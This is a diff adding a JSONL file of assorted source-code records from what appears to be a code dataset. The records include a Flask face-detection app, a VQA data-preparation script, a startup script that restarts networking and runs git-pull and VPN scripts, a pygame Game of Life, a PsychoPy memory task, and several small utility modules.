diff --git "a/2648.jsonl" "b/2648.jsonl" new file mode 100644--- /dev/null +++ "b/2648.jsonl" @@ -0,0 +1,700 @@ +{"seq_id":"260937182","text":"import os\nimport json\nimport uuid\nimport requests\nfrom facepp import app\nfrom flask import render_template, request\nfrom werkzeug.utils import secure_filename\nfrom facepp.pic_processing import pic_pro\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\nSAVE_PATH = 'facepp/static/log/'\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n try:\n # 尝试获取文件\n file = request.files['picture']\n except Exception as e:\n print(e)\n return '未知错误'\n filename_extension = secure_filename(file.filename).split('.')[-1]\n filename = uuid.uuid1()\n filename = '%s.%s' % (filename, filename_extension)\n file.save(\n os.path.join(SAVE_PATH, filename) # 保存图片 facepp/static/log\n )\n\n # 使用requests进行url的post请求\n url = \"https://api-cn.faceplusplus.com/facepp/v3/detect\"\n\n data = {\n 'api_key': os.environ.get('facepp_key'),\n 'api_secret': os.environ.get('facepp_secret'),\n 'return_attributes': 'gender,age,glass',\n\n }\n filename_and_path = \"facepp/static/log/%s\" % filename\n files = {'image_file': open(filename_and_path, 'rb')}\n r = requests.post(url, data=data, files=files)\n response_json = json.loads(r.text)\n # print(response_json)\n new_filename, face_list = pic_pro(response_json=response_json, file_path=filename_and_path)\n re_new_file = \"%s.jpg\" % new_filename\n # print('###\\n\\n', filename)\n # print(re_new_file)\n return render_template(\n \"indexPost.html\",\n img_path=[filename, re_new_file],\n demo_text=face_list\n )\n text1 = \"等待上传图片区域\"\n text2 = \"进行识别图片区域\"\n\n return render_template(\"index.html\", text1=text1, text2=text2)\n\n\n@app.route('/demo/')\ndef demo(num):\n demo1_response = [\n \"男性,34岁,未佩戴眼镜\",\n \"女性,31岁,未佩戴眼镜\",\n \"女性,11岁,未佩戴眼镜\"\n ]\n demo2_response = [\n \"女性,35岁,未佩戴眼镜\",\n \"女性,28岁,未佩戴眼镜\"\n ]\n demo3_response = [\n \"男性,27岁,配带墨镜\"\n ]\n demo_list = [demo1_response, demo2_response, demo3_response]\n pic_path = [\n \"img/demo-pic6.jpg\",\n \"img/demo-pic7.jpg\",\n \"img/demo-pic11.jpg\",\n \"img/finished6.jpg\",\n \"img/finished7.jpg\",\n \"img/finished11.jpg\"\n ]\n if num > len(demo_list):\n num = 1\n text1 = \"等待上传图片区域\"\n text2 = \"进行识别图片区域\"\n return render_template(\n \"demo.html\",\n text1=text1,\n text2=text2,\n demo_text=demo_list[num - 1],\n img_path=[pic_path[num - 1], pic_path[num + 2]]\n )\n","sub_path":"facepp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3416850","text":"import os\nimport json\nimport nltk\nimport utils\nimport vocabulary\nimport numpy as np\nimport constants as C\n\n\ndef prepare(root, dataType, dataSubtype, validAnsSet, taskType=\"OpenEnded\"):\n\t\"\"\"\n\thelper function to prepare vqa dataset given the params\n\t:param root: location of VQAv2 dataset\n\t:param dataType: 'mscoco' for real and 'abstract_v002' for abstract\n\t:param dataSubtype: 'train / valid' + 'year'. Cannot used for test.\n\t:param validAnsSet: answer vocabulary (i.e. answers containing unknown vocab is invalid)\n\t:param taskType: 'MultipleChoice' or 'OpenEnded'. 
We only consider 'OpenEnded' here.\n\t:return: list of length=num_questions, each entry is a dict with following keys: {image_name, image_path,\n\t\t question_id, question_tokens, question_string, all_answers, valid_answers, question_len}\n\t\"\"\"\n\timgDir = os.path.join(root, \"Images\")\n\ttokenizer = nltk.tokenize.TweetTokenizer() # deal with ' better\n\t# initialize the locations of files\n\timgNameFormat, annPath, qstPath = utils.formName(root, dataType, dataSubtype, taskType)\n\t# load annotations, save as dict {key=qstID, value=ann}\n\tassert os.path.exists(annPath)\n\twith open(annPath) as file:\n\t\tannotations = json.load(file)[\"annotations\"]\n\t\tqst2ann_dict = {ann[\"question_id\"]: ann for ann in annotations}\n\t# load questions\n\tassert os.path.exists(qstPath)\n\twith open(qstPath) as file:\n\t\tquestions = json.load(file)[\"questions\"]\n\t# combine data we need\n\tdataset = []\n\tnum_unk_ans = 0\n\tfor i, qst in enumerate(questions):\n\t\t# print process\n\t\tif (i+1) % 10000 == 0:\n\t\t\tprint(\"Processed %d / %d questions\" % (i+1, len(questions)))\n\t\timgID = qst[\"image_id\"]\n\t\tqstID = qst[\"question_id\"]\n\t\tqstStr = qst[\"question\"]\n\t\timgName = imgNameFormat % imgID\n\t\timgPath = os.path.join(imgDir, imgName)\n\t\tqstToken = tokenizer.tokenize(qstStr) # a list of tokens\n\t\tqstLen = len(qstToken) # for attention\n\t\timgInfo = dict(image_name=imgName, image_path=imgPath,\n\t\t question_id=qstID, question_tokens=qstToken,\n\t\t question_string=qstStr, question_len=qstLen)\n\t\t# load answers for train or validation\n\t\tann = qst2ann_dict[qstID]\n\t\tallAns = [a[\"answer\"] for a in ann[\"answers\"]]\n\t\tvalidAns = [a for a in allAns if a in validAnsSet]\n\t\t# answers may not appear in our vocabulary\n\t\tif len(validAns) == 0:\n\t\t\tvalidAns = [\"\"]\n\t\t\tnum_unk_ans += 1\n\t\timgInfo[\"all_answers\"] = allAns\n\t\timgInfo[\"valid_answers\"] = validAns\n\t\tdataset.append(imgInfo)\n\treturn dataset\n\n\ndef load_dataset(mode, trainFile=\"train.npy\", validFile=\"valid.npy\",\n ansFilename=\"vocab_answers.txt\", qstFilename=\"vocab_questions.txt\"):\n\t\"\"\"\n\tload prepared train and validation dataset\n\t:param mode: 'train' or 'valid'\n\t:param trainFile: filename of prepare train dataset\n\t:param validFile: filename of prepare validation dataset\n\t:param ansFilename: filename of answer vocab\n\t:param qstFilename: filename of question vocab\n\t:return: prepare train data if mode == 'train' else validation data\n\t\"\"\"\n\t# load savedVocab\n\tansVocab, _ = vocabulary.load_vocab(ansFilename, qstFilename)\n\tsavedAnsSet = set(ansVocab.wordList)\n\ttrainPath = os.path.join(C.DIR_DATA, trainFile)\n\tvalidPath = os.path.join(C.DIR_DATA, validFile)\n\t# if no saved files, call `prepare()` and save it\n\tif not (os.path.exists(trainPath) and os.path.exists(validPath)):\n\t\ttrain, validation = [], []\n\t\tfor dataType in C.TRAIN:\n\t\t\tsubtypes = C.TRAIN[dataType]\n\t\t\tfor subtype in subtypes:\n\t\t\t\tprint(\"prepare %s %s\" % (dataType, subtype))\n\t\t\t\ttrain += prepare(C.ROOT, dataType, subtype, savedAnsSet)\n\t\tfor dataType in C.VALIDATION:\n\t\t\tsubtypes = C.VALIDATION[dataType]\n\t\t\tfor subtype in subtypes:\n\t\t\t\tprint(\"prepare %s %s\" % (dataType, subtype))\n\t\t\t\tvalidation += prepare(C.ROOT, dataType, subtype, savedAnsSet)\n\t\tnp.save(trainPath, np.array(train))\n\t\tnp.save(validPath, np.array(validation))\n\t# load .npy files\n\ttrain, validation = np.load(trainPath, allow_pickle=True), np.load(validPath, 
allow_pickle=True)\n\treturn train if mode == \"train\" else validation\n","sub_path":"preparation.py","file_name":"preparation.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639055307","text":"from os import system\nfrom json import load\nfrom urllib2 import urlopen\nfrom time import sleep, ctime\n\ndef getIP(maxN=10, S=30):\n\tip = False\n\tn = 0\n\tgoon = True\n\twhile n < maxN and goon:\n\t\ttry:\n\t\t\tn = n + 1\n\t\t\tip = load(urlopen('https://api.ipify.org?format=json'))['ip']\n\t\t\tgoon = False\n\t\texcept:\n\t\t\ttry:\n\t\t\t\tip = load(urlopen('http://jsonip.com'))['ip']\n\t\t\t\tgoon = False\n\t\t\texcept:\n\t\t\t\tprint('Error getting IP on attempt ' + str(n) + '. Sleeping for ' + str(S) + ' seconds.')\n\t\t\t\tsleep(S)\n\treturn(ip)\n\nwith open('/home/joakim/work/startup.log', 'wb') as logFile:\n\ttmpStr = ctime() + ': Starting readyHP.py'\n\tstatStr = '*'*len(tmpStr) + '\\n' + tmpStr + '\\n' + '*'*len(tmpStr) + '\\n\\n' \n\tlogFile.write(statStr)\n\n#Check connection\ndone = False\nt = 0\nwhile not done:\n\tt = t + 1\n\tif t == 15:\n\t\t#20 minutes already. Try bouncing it.\n\t\tprint(ctime() + ': Rebooting')\n\t\tsystem('sudo reboot')\n\tping = system('ping -c 1 60.241.126.187')\n\tif ping == 0:\n\t\tdone = True\n\t\tmess = '\\n' + ctime() + ': Connection established. Proceeding to pull from git.\\n'\n\t\tprint(mess)\n\t\twith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\t\t\tlogFile.write(mess)\n\telse:\n\t\tmess = ctime() + '(' + str(t) + '): No connection. Restarting network service and sleeping for 90 seconds.\\n'\n\t\tprint(mess)\n\t\twith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\t\t\tlogFile.write(mess)\n\t\tsystem('sudo service network-manager restart')\n\t\tsleep(90)\n\n# Pull from git\ngitpull = system('sudo bash ~/work/scraper/gitpull.sh')\n#gitpull = 'disabled'\n\n# Connect to VPN\nmess = '\\n' + ctime() + ': Pulled from git (' + str(gitpull) + '). 
Proceeding to connect VPN.\\n'\nprint(mess)\nwith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\tlogFile.write(mess)\nsystem('sudo bash /home/joakim/work/scraper/convpn.sh')\n","sub_path":"hp1_convpn.py","file_name":"hp1_convpn.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395211573","text":"import pygame\n\nBOARDWIDTH = 64 # how many columns in the board\nBOARDHEIGHT = 64 # how many rows in the board\nSQUARESIZE = 16 # width & height of each space in pixels\n\nGRIDCOLOR = (0, 0, 255)\n\n\n# constants for direction values\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\n# The amount of space to the sides of the board to the edge of the window\n# is used several times, so calculate it once here and store in variables.\nXMARGIN = 4\nYMARGIN = 4\n\nWINDOWWIDTH = BOARDWIDTH * SQUARESIZE + (XMARGIN * 2)\nWINDOWHEIGHT = BOARDHEIGHT * SQUARESIZE + (YMARGIN * 2)\n\ngameBoards = []\nboard = 0\n\n\ndef main():\n global FPSCLOCK, DISPLAYSURF, BASICFONT, BOARDRECTS\n # Initial set up.\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n pygame.display.set_caption('Life')\n BASICFONT = pygame.font.Font('freesansbold.ttf', 36)\n # Create pygame.Rect objects for each board space to\n # do board-coordinate-to-pixel-coordinate conversions.\n BOARDRECTS = []\n for x in range(BOARDWIDTH):\n BOARDRECTS.append([])\n for y in range(BOARDHEIGHT):\n r = pygame.Rect((XMARGIN + (x * SQUARESIZE),\n YMARGIN + (y * SQUARESIZE),\n SQUARESIZE,\n SQUARESIZE))\n BOARDRECTS[x].append(r)\n\n global gameBoards\n global board\n gameBoards = [get_blank_board(), get_blank_board()]\n\n DISPLAYSURF.fill((0, 0, 0))\n\n while True:\n draw_board()\n\n bb = (board + 1) % len(gameBoards)\n\n for x in xrange(BOARDWIDTH):\n for y in xrange(BOARDHEIGHT):\n gameBoards[bb][x][y] = rules(x, y)\n\n board = bb\n\n FPSCLOCK.tick(30)\n\n\ndef get_blank_board():\n # Create and return a blank board data structure.\n the_board = []\n\n for x in range(BOARDWIDTH):\n the_board.append([0] * BOARDHEIGHT)\n\n the_board[10][10] = 1\n the_board[11][10] = 1\n the_board[12][10] = 1\n the_board[12][9] = 1\n the_board[11][8] = 1\n return the_board\n\n\ndef count_neighbours(x, y):\n count = 0\n\n count += gameBoards[board][(x - 1) % BOARDWIDTH][y]\n count += gameBoards[board][(x - 1) % BOARDWIDTH][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][x][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][y]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][(y + 1) % BOARDHEIGHT]\n count += gameBoards[board][x][(y + 1) % BOARDHEIGHT]\n count += gameBoards[board][(x - 1) % BOARDWIDTH][(y + 1) % BOARDHEIGHT]\n\n return count\n\n\ndef rules(x, y):\n value = gameBoards[board][x][y]\n count = count_neighbours(x, y)\n\n if (value == 1 and count == 2) or count == 3:\n return 1\n\n return 0\n\n\ndef draw_board():\n for x in xrange(BOARDWIDTH):\n for y in xrange(BOARDHEIGHT):\n\n if gameBoards[board][x][y] == 1:\n DISPLAYSURF.fill((255, 0, 0), BOARDRECTS[x][y])\n else:\n DISPLAYSURF.fill((0, 0, 0), BOARDRECTS[x][y])\n\n pygame.draw.rect(DISPLAYSURF, (128, 128, 128), BOARDRECTS[x][y], 1)\n\n pygame.display.update()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"519551974","text":"from django.conf.urls import url\r\n\r\nfrom . import views\r\n# === Configurazione URLS per FactoryManagerApp ===\r\nurlpatterns = [\r\n # url che porta alla scheda descrittiva del database\r\n url(r'^schedadescrittiva/', views.schedaDescrittiva , name='test'),\r\n # url che porta alla scheda descrittiva dei dipendenti\r\n url(r'^dipendenti/', views.schedaDipendenti , name='dip'),\r\n # url che porta alla scheda descrittiva degli ambienti\r\n url(r'^ambienti/', views.schedaAmbienti , name='space'),\r\n # url che porta alla scheda descrittiva degli strumenti\r\n url(r'^strumenti/', views.schedaStrumenti , name='tools'),\r\n # url che permette di scaricare il pdf del report completo\r\n url(r'^schedapdf/', views.pdf_view , name='schedapdf'),\r\n]","sub_path":"FactoryManagerApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"627721522","text":"#!/usr/bin/env python\nfrom __future__ import division\n\nimport numpy as np\nimport os\nimport glob\n\nA = np.loadtxt('galaxyzoo/training_solutions_rev1.csv',delimiter=',',usecols=(1,2,3))\n\nnames = np.loadtxt('galaxyzoo/training_solutions_rev1.csv',delimiter=',',usecols=(0,))\n\nclassification = np.zeros( len(A[:,0]) )\nfor i in xrange(0,len(A[:,0])):\n classification[i] = np.argmax(A[i,0:3])\n #if classification[i]==2:\n # print 'YOLO we found a loser! Motherfucker!'\n \nimage_names=[]\nvariation_names=[]\ntotalnames = []\nfor file in glob.glob(\"galaxyzoo/images_augmentation/*.jpg\"):\n name = file\n totalnames.append(str(name))\n name = name.split('/')[-1]\n tempname = name\n name = name.split('-')[0]\n name2 = tempname.split('-')[1]\n name2 = name2.split('.')[0]\n image_names.append(str(name))\n variation_names.append(str(name2))\n\nclas = np.zeros(len(image_names))\nj=0\nfor i in xrange(0,len(image_names)):\n if int(image_names[i]) == int(names[j]):\n clas[i] = classification[j]\n else:\n j+=1\n clas[i] = classification[j]\n \n os.rename(totalnames[i],'galaxyzoo/images_augmentation/'+str(image_names[i])+'-'+str(variation_names[i])+'_'+str(int(clas[i]))+'.jpg' )\n\n\n","sub_path":"easyloadtraining.py","file_name":"easyloadtraining.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"393797979","text":"'''Rita Sonka\n10/24/2016\nPh 20\nhw 4\n'''\n\n\n\nimport numericalSpring as nS\n\n\n# This is the master \"make plots\" file, the one I originally made before being told I needed to have the makefile update images individually (could in theory make sense if one took really long to make...). 
Preserved just in case.\n\ngraphicsFolder = \"../week3Graphics/\"\n\n# Figure 1\nnS.plotExplicitEuler(0, 5, .2, 100, graphicsFolder + \"explicitEuler1.pdf\")\n# Figure 2\nnS.plotExplicitEulerErrors(0, 5, .2, 100, graphicsFolder + \"explicitEulerErrors1.pdf\")\n# Figure 3\nnS.eE_truncation(0, 5, .04, 20, graphicsFolder + \"eE_truncation.pdf\")\n# Figure 4\nnS.eE_energy(0, 5, .2, 100, graphicsFolder + \"eE_energy.pdf\")\n# Figure 5\nnS.plotImplicitEuler(0, 5, .2, 100, graphicsFolder + \"implicitEuler1.pdf\")\n# Figure 6\nnS.plotImplicitEulerErrors(0, 5, .2, 100, graphicsFolder + \"implicitEulerErrors1.pdf\")\n# Figure 7\nnS.iE_energy(0, 5, .2, 100, graphicsFolder + \"iE_energy.pdf\")\n# Figure 8 (actually two files)\nnS.eE_iE_phaseSpace(0, 5, .2, 100, graphicsFolder + \"eE_phaseSpace.pdf\", graphicsFolder + \"iE_phaseSpace.pdf\")\n# Figure 9\nnS.symp_phaseSpace(0, 5, .2, 100, graphicsFolder + \"symp_phaseSpace.pdf\")\n# Figure 10\nnS.symp_energy(0, 5, .2, 100, graphicsFolder + \"symp_energy.pdf\")\n# Figure 11\nnS.symp_lag(0, 5, .2, 1000, graphicsFolder + \"symp_lag.pdf\")\n\n","sub_path":"plotGenerationScripts/makePlots.py","file_name":"makePlots.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"62938822","text":"class Paciente:\r\n def __init__(self, id, nombre, apellido, fecha_nacimiento, sexo, nombre_usuario, pwd, telefono):\r\n self.id = id\r\n self.nombre = nombre\r\n self.apellido = apellido\r\n self.fecha_nacimiento = fecha_nacimiento\r\n self.sexo = sexo\r\n self.nombre_usuario = nombre_usuario\r\n self.pwd = pwd\r\n self.telefono = telefono\r\n\r\n def dump(self):\r\n return {\r\n 'id': self.id,\r\n 'nombre': self.nombre,\r\n 'apellido': self.apellido,\r\n 'fecha_nacimiento': self.fecha_nacimiento,\r\n 'sexo': self.sexo,\r\n 'nombre_usuario': self.nombre_usuario,\r\n 'pwd': self.pwd,\r\n 'telefono': self.telefono\r\n }","sub_path":"paciente.py","file_name":"paciente.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"99146163","text":"#P56\n\n\"\"\"\nA googol (10**100) is a massive number: one followed by one-hundred zeros; 100100 is almost unimaginably large: one followed by two-hundred zeros. 
Despite their size, the sum of the digits in each number is only 1.\n\nConsidering natural numbers of the form, a**b, where a, b < 100, what is the maximum digital sum?\n\"\"\"\nmax_sum=0\nfor a in range(1,100):\n for b in range(1,100):\n number=a**b\n digits=[]\n str_number=str(number)\n for th_digit in range(0,len(str_number)):\n digits.append(int(str_number[th_digit]))\n current_sum=sum(digits)\n if max_sum < current_sum:\n max_sum=current_sum\n\nprint(max_sum)\n","sub_path":"P56.py","file_name":"P56.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"488607884","text":"'''\nCreated on Feb 23, 2015\n\nThis module is intended to have all constants and global values for pim_dm\n\n@author: alex\n'''\n\nASSERT_TIME = 180\n\nGRAFT_RETRY_PERIOD = 3\n\nOVERRIDE_INTERVAL = 2.5\n\nJT_OVERRIDE_INTERVAL = 3.0\n\nT_LIMIT = 210","sub_path":"src/pim_dm/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"51769783","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 28 16:15:24 2019\n\n@author: Francois\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom psychopy import core\nfrom psychopy import data\nfrom psychopy import event\nfrom psychopy import visual\nfrom Categories import Categories\nfrom flatten import flatten\nfrom randSign import randSign\n\nclass imTask(object):\n def __init__(self,nTrial,nStim):\n self.nTrial = nTrial\n self.nStim = nStim\n self.categs = Categories(nTrial,nStim)\n self.encDict = self.categs.encDF.to_dict(orient=\"index\")\n self.recDict = self.categs.recDF.to_dict(orient=\"index\")\n# self.encTask = Encoding(nTrial,nStim)\n self.encStimlist = []\n self.answerlist = []\n self.stimpos = {'0':(-250.0, 250.0),\n '1':(250.0, 250.0),\n '2':(250.0, -250.0),\n '3':(-250.0, -250.0)}\n \n self.targetPos = self.getTargPos()\n \n self.encInstStartText = '''\\\n ... Memorize the following images and\n ... their location on screen.\\\n ... Press space to start.\\\n '''.format()\n \n self.recInstStartText = '''\\\n ... A series of {x} images will appear.\n ... Indicate if shown image corresponds to a previously seen image\n ... and in which quadrant it has appeared earlier.\n ... Press SPACE to start\\\n '''.format(x=self.nStim+1)\n \n self.recInstText1 = '''\\\n ... Have you seen this picture before?\n ... If yes, press \"y\". If not, press \"n\".\\\n '''.format()\n \n self.recInstText2 = '''\\\n ... Where have you seen it? \n ... Press 0, 1, 2 or 3 to answer\\\n '''.format()\n \n self.recInstPosText = '''\\\n ... Where have you seen it?\n ... 0 = upper-left, 1 = upper-right\n ... 
2 = lower-left, 3 = lower-right\\\n '''.format()\n \n self.ansSaveText = 'Answer saved!'\n \n self.endText = 'Thank you for your time, goodbye!'\n\n def setstimpos(self):\n setpos = (randSign()*250, randSign()*250)\n return setpos\n \n def getTargPos(self):\n for encstim in range(len(self.encStimlist)):\n for name,pos in self.encStimlist[encstim]:\n if name == self.thisTrialTarg:\n targPos = pos\n return targPos\n\n def getAnswers(self):\n for stim in range(len(self.TrialDict['recStims'])):\n shownStim = self.TrialDict['recStims'][stim]\n if shownStim == self.thisTrialTarg:\n# print('TargetFound!')\n if 'y' in self.TrialDict['Recognition'][stim]:\n if self.TrialDict['StimPosAnswers'][stim] == self.targetPos:\n self.answerlist.append('recogOKposOK')\n elif self.TrialDict['StimPosAnswers'][stim] != self.targetPos:\n self.answerlist.append('recogOKposWrong')\n elif 'n' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('Miss')\n elif shownStim != self.thisTrialTarg:\n if 'y' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('FalseAlarm')\n elif 'n' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('RejectOK')\n return self.answerlist\n \n def runEnc(self,whichTrial):\n self.whichTrial = whichTrial\n self.thisEncTrial = self.encDict[self.whichTrial]\n self.win = visual.Window(size=(1000, 1000), \n color=(0, 0 , 0), \n units = 'pix')\n self.encInstStart = visual.TextStim(self.win, \n text = self.encInstStartText)\n self.encInstStart.draw()\n self.win.flip()\n event.waitKeys(keyList=[\"space\"])\n for stim in range(len(self.thisEncTrial)):\n encstim = visual.ImageStim(self.win,\n self.thisEncTrial[stim],\n color=(1,1,1), \n pos = self.setstimpos(), \n size = (500, 500),\n name=self.thisEncTrial[stim])\n encstim.draw()\n self.win.flip()\n encStimTuple = (encstim.name, tuple(encstim.pos))\n \n self.encStimlist.append(encStimTuple)\n core.wait(1)\n \n self.win.close()\n self.stimDF = pd.DataFrame(self.encStimlist,columns=['encStims', 'encPos'])\n self.stimDict = self.stimDF.to_dict(orient=\"dict\")\n# self.stimDF.to_csv(os.getcwd()+'\\\\stimDF2.csv')\n return self.encStimlist\n\n#for stimName, stimPos in stimTuple:\n# for (key,value) in self.TrialDict.items():\n# for (key,value) in self.stimpos.items():\n# if self.TrialDict[value] == self.stimpos[key]:\n# stimTuple = (stimulus.name, stimulus.pos, self.stimpos) \n\n \n \n def runRec(self,whichTrial):\n self.whichTrial = whichTrial\n \n self.thisRecTrial = self.recDict[self.whichTrial]\n \n self.thisTrialTarg = self.categs.Targs[self.whichTrial]\n\n self.win = visual.Window(size=(1000, 1000), \n color=(0, 0 , 0), \n units = 'pix')\n \n self.recInstStart = visual.TextStim(self.win,\n text=self.recInstStartText)\n \n self.recInstPos = visual.TextStim(self.win,\n text=self.recInstPosText,\n pos=(0.0,-300))\n \n self.recInst1 = visual.TextStim(self.win,\n text=self.recInstText1,\n pos=(0.0,300))\n \n self.recInst2 = visual.TextStim(self.win,\n text=self.recInstText2)\n\n self.ansRec = visual.TextStim(self.win,\n text=self.ansSaveText)\n \n self.end = visual.TextStim(self.win, text=self.endText)\n \n self.stimNamelist = []\n self.recKeylist = []\n posAnsKeys= []\n self.stimPosAnswers = []\n self.recInstStart.draw()\n self.win.flip()\n \n event.waitKeys(keyList=[\"space\"])\n for stim in range(len(self.thisRecTrial)):\n stimulus = visual.ImageStim(self.win,\n self.thisRecTrial[stim],\n color=(1,1,1), \n pos = (0.0,0.0), \n size = (500, 500),\n name=self.thisRecTrial[stim])\n self.recInst1.draw()\n 
self.recInst1.autoDraw = True\n stimulus.draw()\n self.win.flip()\n recKeys = event.waitKeys(keyList=['y','n'])\n if 'y' in recKeys:\n self.recInst2.draw()\n self.win.flip()\n posKeys = event.waitKeys(keyList=['0','1','2','3'])\n posAnsKeys.append(posKeys)\n core.wait(1)\n elif 'n' in recKeys:\n posAnsKeys.append('None')\n self.posKeylist = flatten(posAnsKeys)\n self.recKeylist.append(recKeys)\n self.stimNamelist.append(stimulus.name)\n self.ansRec.draw()\n self.win.flip()\n core.wait(1)\n for posKey in range(len(self.posKeylist)):\n if self.posKeylist[posKey] != 'None':\n self.stimPosAnswers.append(self.stimpos[str(posKey)])\n elif self.posKeylist[posKey] == 'None':\n self.stimPosAnswers.append('None')\n \n self.TrialDict = {'recStims':self.stimNamelist,\n 'Recognition':flatten(self.recKeylist),\n 'PosKeylist':self.posKeylist,\n 'StimPosAnswers':self.stimPosAnswers}\n \n# for answer in self.TrialDict['PosAnswers']:\n self.TrialDF = pd.DataFrame(self.TrialDict)\n self.end.draw()\n self.win.flip()\n core.wait(2)\n self.win.close()\n return self.TrialDict\n\ntask01 = imTask(2,3)\n\nenctask01 = task01.runEnc(0)\nrectask01 = task01.runRec(0) \nanswerlist = task01.getAnswers()\n\n#task02 = imTask(0,2,3)\n#stimpos02 = task02.stimpos\n#encdict02 = task02.encDict[0]\n#targ02 = task02.categs.Targs[0]\n#recdict02 = task02.recDict[0]\n#enctask02 = task02.runEnc()\n#rectask02 = task02.runRec() \n#\n#bigdict= {'encdict':encdict02, 'targ':targ02, 'recdict':recdict02, 'enctask02':enctask02, 'rectask':rectask02}\n#targ02test = task02.categs.Targs\n#for item in range(len(rectask01['PosKeylist'])):\n# print(item)\n#enc = Encoding(2,3).trials.trialList[0]['Encoding']","sub_path":"fullTask.py","file_name":"fullTask.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"620902816","text":"# -*- coding: UTF-8 -*-\nimport logging\nfrom collections import OrderedDict\n\nfrom jetCore.db.tables import dbCollateral, dbCollateralMap\nfrom jetCore.reference.reftable import refTable\n\n__pgmname__ = \"Collateral\"\n__author__ = \"AJ Reynolds\"\n__email__ = \"ar380v@att.com\"\n\n__maintainer__ = __author__\n\nlog = logging.getLogger(__pgmname__)\n\n\nclass Collateral(refTable):\n \"\"\"\n Purpose:\n jetObject for a Collateral Entry\n \"\"\"\n\n def __init__(self, parent=None, *args, **kwargs):\n super(Collateral, self).__init__()\n self.Collateral_ID = None\n self._recommendation_ID = None\n self.CType = None\n self.Title = None\n self.Description = None\n self.Notes = None\n self.URL = None\n self.Created = None\n self.Created_By = None\n self.Updated = None\n self.Updated_By = None\n self.AffinityP = {}\n self.AffinityC = {}\n\n self._fieldMap = OrderedDict()\n self._fieldMap['CType'] = 'Type'\n self._fieldMap['Title'] = 'Title'\n self._key = 'Collateral_ID'\n self._value = 'Title'\n self._dbCollateral = None\n self._dbRecCollat = None\n delattr(self, 'Order')\n self.loadAttr(dbCollateral, **kwargs)\n self.parent = parent\n return\n\n @property\n def ID(self):\n return self.Collateral_ID\n\n @ID.setter\n def ID(self, value):\n self.Collateral_ID = value\n\n\ndef get_collateral():\n import contextlib\n from jetCore.db import db\n\n with contextlib.closing(db.session) as session:\n _collatList = {}\n _collateral = Collateral(Collateral_ID='Collateral', CType='Collateral')\n _items = session.query(dbCollateral).all()\n for _item in _items:\n _collat = Collateral(**_item.as_dict())\n _collatList[_collat.key] = _collat\n _ctype = 
_collateral.find(_item.CType)\n            if _ctype is None:\n                _ctype = Collateral(Collateral_ID=_item.CType, CType=_item.CType)\n                _collateral.add(_ctype)\n            _ctype.add(_collat)\n\n        _items = session.query(dbCollateralMap).all()\n        for _item in _items:\n            # 1 is Strong --> 3 weak\n            addParentToChildAffinity(_collatList[_item.Parent_CID],\n                                     _item.RelationshipAffinity,\n                                     _item.Child_CID)\n            addChildToParentAffinity(_collatList[_item.Child_CID],\n                                     _item.RelationshipAffinity,\n                                     _collatList[_item.Parent_CID])\n        # print(RenderTree(_collateral, style=AsciiStyle()))\n    return _collateral\n\n\ndef addParentToChildAffinity(collateral, affinity, childID):\n    if affinity not in collateral.AffinityP or childID not in collateral.AffinityP[affinity]:\n        try:\n            collateral.AffinityP[affinity].append(childID)\n        except:\n            collateral.AffinityP[affinity] = [childID]\n    return\n\n\ndef addChildToParentAffinity(collateral, affinity, parentID):\n    if collateral.CType == 'Principle':  # ToDo: Fix the data\n        return\n    if affinity not in collateral.AffinityC or parentID not in collateral.AffinityC[affinity]:\n        try:\n            collateral.AffinityC[affinity].append(parentID)\n        except:\n            collateral.AffinityC[affinity] = [parentID]\n    return\n","sub_path":"jetCore/reference/collateral.py","file_name":"collateral.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 